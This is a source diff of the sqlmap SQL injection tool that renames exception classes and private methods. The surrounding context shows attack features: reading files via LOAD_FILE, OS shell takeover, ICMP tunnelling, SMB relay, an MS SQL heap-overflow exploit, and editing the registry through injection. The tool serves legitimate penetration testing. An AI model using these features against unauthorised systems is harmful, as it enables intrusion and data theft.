infoMsg = "skipping table '%s'" % table infoMsg = "skipping table '%s'" % table
logger.info(infoMsg) logger.info(infoMsg)

18
plugins/generic/filesystem.py
View File

@ -24,7 +24,7 @@ from lib.core.enums import DBMS
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapUndefinedMethod from lib.core.exception import SqlmapUndefinedMethod
from lib.request import inject from lib.request import inject
class Filesystem: class Filesystem:
@ -36,7 +36,7 @@ class Filesystem:
self.fileTblName = "sqlmapfile" self.fileTblName = "sqlmapfile"
self.tblField = "data" self.tblField = "data"
def __unhexString(self, hexStr): def _unhexString(self, hexStr):
if len(hexStr) % 2 != 0: if len(hexStr) % 2 != 0:
errMsg = "for some reason(s) sqlmap retrieved an odd-length " errMsg = "for some reason(s) sqlmap retrieved an odd-length "
errMsg += "hexadecimal string which it is not able to convert " errMsg += "hexadecimal string which it is not able to convert "
@ -53,7 +53,7 @@ class Filesystem:
return cleanStr return cleanStr
def __checkWrittenFile(self, wFile, dFile, fileType): def _checkWrittenFile(self, wFile, dFile, fileType):
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
lengthQuery = "SELECT LENGTH(LOAD_FILE('%s'))" % dFile lengthQuery = "SELECT LENGTH(LOAD_FILE('%s'))" % dFile
@ -157,29 +157,29 @@ class Filesystem:
output = readInput(message, default="Y") output = readInput(message, default="Y")
if not output or output in ("y", "Y"): if not output or output in ("y", "Y"):
return self.__checkWrittenFile(wFile, dFile, fileType) return self._checkWrittenFile(wFile, dFile, fileType)
return True return True
def nonStackedReadFile(self, rFile): def nonStackedReadFile(self, rFile):
errMsg = "'nonStackedReadFile' method must be defined " errMsg = "'nonStackedReadFile' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg
def stackedReadFile(self, rFile): def stackedReadFile(self, rFile):
errMsg = "'stackedReadFile' method must be defined " errMsg = "'stackedReadFile' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg
def unionWriteFile(self, wFile, dFile, fileType): def unionWriteFile(self, wFile, dFile, fileType):
errMsg = "'unionWriteFile' method must be defined " errMsg = "'unionWriteFile' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg
def stackedWriteFile(self, wFile, dFile, fileType): def stackedWriteFile(self, wFile, dFile, fileType):
errMsg = "'stackedWriteFile' method must be defined " errMsg = "'stackedWriteFile' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg
def readFile(self, rFile): def readFile(self, rFile):
fileContent = None fileContent = None
@ -230,7 +230,7 @@ class Filesystem:
fileContent = newFileContent fileContent = newFileContent
fileContent = self.__unhexString(fileContent) fileContent = self._unhexString(fileContent)
rFilePath = dataToOutFile(fileContent) rFilePath = dataToOutFile(fileContent)
if not Backend.isDbms(DBMS.PGSQL): if not Backend.isDbms(DBMS.PGSQL):

8
plugins/generic/fingerprint.py
View File

@ -9,7 +9,7 @@ from lib.core.common import Backend
from lib.core.common import readInput from lib.core.common import readInput
from lib.core.data import logger from lib.core.data import logger
from lib.core.enums import OS from lib.core.enums import OS
from lib.core.exception import sqlmapUndefinedMethod from lib.core.exception import SqlmapUndefinedMethod
class Fingerprint: class Fingerprint:
""" """
@ -22,17 +22,17 @@ class Fingerprint:
def getFingerprint(self): def getFingerprint(self):
errMsg = "'getFingerprint' method must be defined " errMsg = "'getFingerprint' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg
def checkDbms(self): def checkDbms(self):
errMsg = "'checkDbms' method must be defined " errMsg = "'checkDbms' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg
def checkDbmsOs(self, detailed=False): def checkDbmsOs(self, detailed=False):
errMsg = "'checkDbmsOs' method must be defined " errMsg = "'checkDbmsOs' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg
def forceDbmsEnum(self): def forceDbmsEnum(self):
pass pass

8
plugins/generic/misc.py
View File

@ -23,8 +23,8 @@ from lib.core.enums import DBMS
from lib.core.enums import HASHDB_KEYS from lib.core.enums import HASHDB_KEYS
from lib.core.enums import OS from lib.core.enums import OS
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject from lib.request import inject
class Miscellaneous: class Miscellaneous:
@ -79,7 +79,7 @@ class Miscellaneous:
first, last = 29, 9 first, last = 29, 9
else: else:
raise sqlmapUnsupportedFeatureException, "unsupported DBMS" raise SqlmapUnsupportedFeatureException, "unsupported DBMS"
query = queries[Backend.getIdentifiedDbms()].substring.query % (queries[Backend.getIdentifiedDbms()].banner.query, first, last) query = queries[Backend.getIdentifiedDbms()].substring.query % (queries[Backend.getIdentifiedDbms()].banner.query, first, last)
@ -189,6 +189,6 @@ class Miscellaneous:
condParam = "='%s'" condParam = "='%s'"
else: else:
errMsg = "invalid value" errMsg = "invalid value"
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
return choice, condParam return choice, condParam

10
plugins/generic/search.py
View File

@ -25,8 +25,8 @@ from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CURRENT_DB from lib.core.settings import CURRENT_DB
from lib.request import inject from lib.request import inject
from lib.techniques.brute.use import columnExists from lib.techniques.brute.use import columnExists
@ -148,7 +148,7 @@ class Search:
if test[0] in ("n", "N"): if test[0] in ("n", "N"):
return return
elif test[0] in ("q", "Q"): elif test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
else: else:
regex = "|".join(conf.tbl.split(",")) regex = "|".join(conf.tbl.split(","))
return tableExists(paths.COMMON_TABLES, regex) return tableExists(paths.COMMON_TABLES, regex)
@ -306,7 +306,7 @@ class Search:
if test[0] in ("n", "N"): if test[0] in ("n", "N"):
return return
elif test[0] in ("q", "Q"): elif test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
else: else:
regex = "|".join(conf.col.split(",")) regex = "|".join(conf.col.split(","))
conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS, regex)) conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS, regex))
@ -558,4 +558,4 @@ class Search:
else: else:
errMsg = "missing parameter, provide -D, -T or -C along " errMsg = "missing parameter, provide -D, -T or -C along "
errMsg += "with --search" errMsg += "with --search"
raise sqlmapMissingMandatoryOptionException, errMsg raise SqlmapMissingMandatoryOptionException, errMsg

6
plugins/generic/syntax.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUndefinedMethod from lib.core.exception import SqlmapUndefinedMethod
class Syntax: class Syntax:
""" """
@ -19,10 +19,10 @@ class Syntax:
def unescape(expression, quote=True): def unescape(expression, quote=True):
errMsg = "'unescape' method must be defined " errMsg = "'unescape' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg
@staticmethod @staticmethod
def escape(expression): def escape(expression):
errMsg = "'escape' method must be defined " errMsg = "'escape' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg

50
plugins/generic/takeover.py
View File

@ -16,12 +16,12 @@ from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import OS from lib.core.enums import OS
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapMissingDependence from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import sqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import sqlmapMissingPrivileges from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import sqlmapNotVulnerableException from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import sqlmapUndefinedMethod from lib.core.exception import SqlmapUndefinedMethod
from lib.core.exception import sqlmapUnsupportedDBMSException from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.takeover.abstraction import Abstraction from lib.takeover.abstraction import Abstraction
from lib.takeover.icmpsh import ICMPsh from lib.takeover.icmpsh import ICMPsh
from lib.takeover.metasploit import Metasploit from lib.takeover.metasploit import Metasploit
@ -51,7 +51,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
else: else:
errMsg = "unable to execute operating system commands via " errMsg = "unable to execute operating system commands via "
errMsg += "the back-end DBMS" errMsg += "the back-end DBMS"
raise sqlmapNotVulnerableException(errMsg) raise SqlmapNotVulnerableException(errMsg)
self.getRemoteTempPath() self.getRemoteTempPath()
self.initEnv(web=web) self.initEnv(web=web)
@ -74,7 +74,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
errMsg = "unable to prompt for an interactive operating " errMsg = "unable to prompt for an interactive operating "
errMsg += "system shell via the back-end DBMS because " errMsg += "system shell via the back-end DBMS because "
errMsg += "stacked queries SQL injection is not supported" errMsg += "stacked queries SQL injection is not supported"
raise sqlmapNotVulnerableException(errMsg) raise SqlmapNotVulnerableException(errMsg)
self.getRemoteTempPath() self.getRemoteTempPath()
self.initEnv(web=web) self.initEnv(web=web)
@ -124,7 +124,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
errMsg += "if you want to establish an out-of-band ICMP " errMsg += "if you want to establish an out-of-band ICMP "
errMsg += "tunnel because icmpsh uses raw sockets to " errMsg += "tunnel because icmpsh uses raw sockets to "
errMsg += "sniff and craft ICMP packets" errMsg += "sniff and craft ICMP packets"
raise sqlmapMissingPrivileges, errMsg raise SqlmapMissingPrivileges, errMsg
try: try:
from impacket import ImpactDecoder from impacket import ImpactDecoder
@ -133,7 +133,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
errMsg = "sqlmap requires 'impacket' third-party library " errMsg = "sqlmap requires 'impacket' third-party library "
errMsg += "in order to run icmpsh master. Download from " errMsg += "in order to run icmpsh master. Download from "
errMsg += "http://oss.coresecurity.com/projects/impacket.html" errMsg += "http://oss.coresecurity.com/projects/impacket.html"
raise sqlmapMissingDependence, errMsg raise SqlmapMissingDependence, errMsg
sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all" sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all"
@ -232,7 +232,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
else: else:
errMsg = "unable to prompt for an out-of-band session because " errMsg = "unable to prompt for an out-of-band session because "
errMsg += "stacked queries SQL injection is not supported" errMsg += "stacked queries SQL injection is not supported"
raise sqlmapNotVulnerableException(errMsg) raise SqlmapNotVulnerableException(errMsg)
if tunnel == 1: if tunnel == 1:
if not web or (web and self.webBackdoorUrl is not None): if not web or (web and self.webBackdoorUrl is not None):
@ -248,14 +248,14 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
errMsg = "the back-end DBMS underlying operating system is " errMsg = "the back-end DBMS underlying operating system is "
errMsg += "not Windows: it is not possible to perform the SMB " errMsg += "not Windows: it is not possible to perform the SMB "
errMsg += "relay attack" errMsg += "relay attack"
raise sqlmapUnsupportedDBMSException(errMsg) raise SqlmapUnsupportedDBMSException(errMsg)
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
if Backend.getIdentifiedDbms() in ( DBMS.PGSQL, DBMS.MSSQL ): if Backend.getIdentifiedDbms() in ( DBMS.PGSQL, DBMS.MSSQL ):
errMsg = "on this back-end DBMS it is only possible to " errMsg = "on this back-end DBMS it is only possible to "
errMsg += "perform the SMB relay attack if stacked " errMsg += "perform the SMB relay attack if stacked "
errMsg += "queries are supported" errMsg += "queries are supported"
raise sqlmapUnsupportedDBMSException(errMsg) raise SqlmapUnsupportedDBMSException(errMsg)
elif Backend.isDbms(DBMS.MYSQL): elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "since stacked queries are not supported, " debugMsg = "since stacked queries are not supported, "
@ -300,7 +300,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
errMsg += "2000 or 2005 to be able to exploit the heap-based " errMsg += "2000 or 2005 to be able to exploit the heap-based "
errMsg += "buffer overflow in the 'sp_replwritetovarbin' " errMsg += "buffer overflow in the 'sp_replwritetovarbin' "
errMsg += "stored procedure (MS09-004)" errMsg += "stored procedure (MS09-004)"
raise sqlmapUnsupportedDBMSException(errMsg) raise SqlmapUnsupportedDBMSException(errMsg)
infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion() infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion()
infoMsg += "'sp_replwritetovarbin' stored procedure heap-based " infoMsg += "'sp_replwritetovarbin' stored procedure heap-based "
@ -325,9 +325,9 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
def uncPathRequest(self): def uncPathRequest(self):
errMsg = "'uncPathRequest' method must be defined " errMsg = "'uncPathRequest' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise sqlmapUndefinedMethod, errMsg raise SqlmapUndefinedMethod, errMsg
def __regInit(self): def _regInit(self):
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
return return
@ -336,13 +336,13 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
if not Backend.isOs(OS.WINDOWS): if not Backend.isOs(OS.WINDOWS):
errMsg = "the back-end DBMS underlying operating system is " errMsg = "the back-end DBMS underlying operating system is "
errMsg += "not Windows" errMsg += "not Windows"
raise sqlmapUnsupportedDBMSException(errMsg) raise SqlmapUnsupportedDBMSException(errMsg)
self.initEnv() self.initEnv()
self.getRemoteTempPath() self.getRemoteTempPath()
def regRead(self): def regRead(self):
self.__regInit() self._regInit()
if not conf.regKey: if not conf.regKey:
default = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" default = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
@ -364,7 +364,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
return self.readRegKey(regKey, regVal, True) return self.readRegKey(regKey, regVal, True)
def regAdd(self): def regAdd(self):
self.__regInit() self._regInit()
errMsg = "missing mandatory option" errMsg = "missing mandatory option"
@ -373,7 +373,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
regKey = readInput(msg) regKey = readInput(msg)
if not regKey: if not regKey:
raise sqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
else: else:
regKey = conf.regKey regKey = conf.regKey
@ -382,7 +382,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
regVal = readInput(msg) regVal = readInput(msg)
if not regVal: if not regVal:
raise sqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
else: else:
regVal = conf.regVal regVal = conf.regVal
@ -391,7 +391,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
regData = readInput(msg) regData = readInput(msg)
if not regData: if not regData:
raise sqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
else: else:
regData = conf.regData regData = conf.regData
@ -412,7 +412,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
self.addRegKey(regKey, regVal, regType, regData) self.addRegKey(regKey, regVal, regType, regData)
def regDel(self): def regDel(self):
self.__regInit() self._regInit()
errMsg = "missing mandatory option" errMsg = "missing mandatory option"
@ -421,7 +421,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
regKey = readInput(msg) regKey = readInput(msg)
if not regKey: if not regKey:
raise sqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
else: else:
regKey = conf.regKey regKey = conf.regKey
@ -430,7 +430,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
regVal = readInput(msg) regVal = readInput(msg)
if not regVal: if not regVal:
raise sqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
else: else:
regVal = conf.regVal regVal = conf.regVal

Some files were not shown because too many files have changed in this diff Show More